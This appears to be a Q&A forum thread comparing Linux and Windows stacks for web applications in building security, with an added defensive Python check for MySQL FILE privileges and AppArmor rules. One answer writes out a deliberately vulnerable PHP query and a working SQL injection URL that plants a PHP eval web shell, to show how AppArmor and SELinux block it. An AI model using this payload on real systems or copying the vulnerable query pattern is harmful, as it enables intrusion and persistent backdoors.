In this case security means building security (access control, alarm systems, etc.). I am not talking about working directly with the hardware, but am more focused on web-based applications/APIs that clients or companies can use.

Are there technologies that are commonly used? Are there technologies that shouldn't be used? Are there any real benefits to a Linux-based stack as opposed to a Windows-based stack for exposing web-based applications?

+1  A: 

Are there any real benefits to a Linux-based stack as opposed to a Windows-based stack for exposing web-based applications?

The answer is yes, no doubt about it. All platforms have their problems. However, Linux security systems such as SELinux and AppArmor will break exploits that Windows cannot, and I can give a great example.

It is tricky to obtain full remote code execution with MySQL. MS-SQL can allow access to xp_cmdshell(), which calls cmd.exe; this makes exploiting SQL injection a lot easier with this privilege.

To exploit a LAMP system that is vulnerable to SQL injection, your best bet is to upload a .php file and try to execute it. In MySQL there are the file_priv functions, most importantly: load_file() and into outfile "...". A SQL injection attack will look like this:

Vulnerable code:

mysql_query('select "name" from users where id='.$_GET['id']);

The corresponding exploit code:

http://127.0.0.1/sql_inj.php?id=1 union select "<?php eval($_GET[e]);?>" into outfile "/var/www/backdoor.php"

This does assume that the document root is in /var/www and that the database and httpd are on the same system. The important part is that both AppArmor and SELinux will not allow MySQL to create the file /var/www/backdoor.php and the exploit will fail.

In this case the best approach is to disallow file_priv; however, this attack pattern of creating a persistent backdoor is extremely common with other exploits. This is exactly why AppArmor and SELinux have been built: to break the exploitation process.

By contrast, Windows 2008 has absolutely no security system to stop this type of attack. Windows usually lags behind when it comes to security features; you can see this with Microsoft's slow adoption of memory protection such as canaries and ASLR.

Furthermore, Microsoft is responsible for more dangerous software bugs than any other software vendor.

Rook
Your last statement is no longer true according to Symantec. Microsoft was passed by Adobe in 2009. Microsoft still dominated in quantity of vulnerabilities executed, but Adobe had the most severely executed vulnerability. Read the threat report volume XV: http://www.symantec.com/business/theme.jsp?themeid=threatreport
Disregard the previous comment. Adobe had the second most severely attacked vulnerability and not the first. I was in error.
@Austin Cheney I agree that Adobe has a horrible track record. I was mainly referring to the link of the top 30 bugs I posted which shows Microsoft as the clear winner with the most serious bug and the most appearances.
Rook
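
A defender's check for the two mitigations the first answer names, as an added example that is not code from the original posts: it lists accounts holding the FILE privilege and tests whether an AppArmor profile for mysqld would permit a write into the document root. The function names, grant lines and profile text are constructed for illustration, and the profile parser is a simplification that reads only the common `path perms,` rule form.

```python
import re

# Global (ON *.*) lines of SHOW GRANTS output; FILE can only be granted globally.
GLOBAL_GRANT = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+\*\.\*\s+TO\s+(?P<who>\S+@\S+)", re.I)

def accounts_with_file_priv(grant_lines):
    """Accounts able to use INTO OUTFILE / LOAD_FILE(): FILE or ALL on *.*."""
    risky = []
    for line in grant_lines:
        m = GLOBAL_GRANT.match(line.strip())
        privs = {p.strip().upper() for p in m.group("privs").split(",")} if m else set()
        if privs & {"FILE", "ALL", "ALL PRIVILEGES"}:
            risky.append(m.group("who"))
    return risky

def _glob(pattern):
    # AppArmor globs: ** crosses '/', * does not. Other glob forms are not handled.
    rx = re.escape(pattern).replace(r"\*\*", ".*").replace(r"\*", "[^/]*")
    return re.compile(rx)

def write_rules_for(profile_text, target):
    """Profile rules that let the confined process write `target`.
    Simplification: only the `[deny] [owner] /path perms,` rule form is parsed."""
    allowed = []
    for raw in profile_text.splitlines():
        tokens = raw.split("#", 1)[0].strip().rstrip(",").split()
        if len(tokens) < 2 or not tokens[-2].startswith("/"):
            continue  # profile header, closing brace, capability lines, etc.
        path, perms = tokens[-2], tokens[-1]
        if not set(perms) & {"w", "a"} or not _glob(path).fullmatch(target):
            continue
        if "deny" in tokens[:-2]:
            return []  # an explicit deny overrides any allow rule
        allowed.append(f"{path} {perms}")
    return allowed  # empty list: an enforcing profile refuses the write

# Constructed sample inputs (not from a real host).
GRANTS = [
    "GRANT SELECT, INSERT ON `shop`.* TO 'report'@'localhost'",
    "GRANT SELECT, FILE ON *.* TO 'webapp'@'localhost'",
    "GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION",
]
CONFINED = """/usr/sbin/mysqld {
  /etc/mysql/** r,
  /var/lib/mysql/** rwk,
}"""
WEAK = CONFINED.replace("}", "  /var/www/** rw,\n}")
```

An empty result from `write_rules_for` only means the write is blocked when the profile is loaded in enforce mode; a profile in complain mode logs the access and allows it.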
A: 

I actually wrote a paper about this recently. More important than what I wrote are the sources I referenced. This will not tell you what you should use to be secure, but instead seeks to identify the problems so you can better know what not to use.

http://mailmarkup.org/Security_Solution.pdf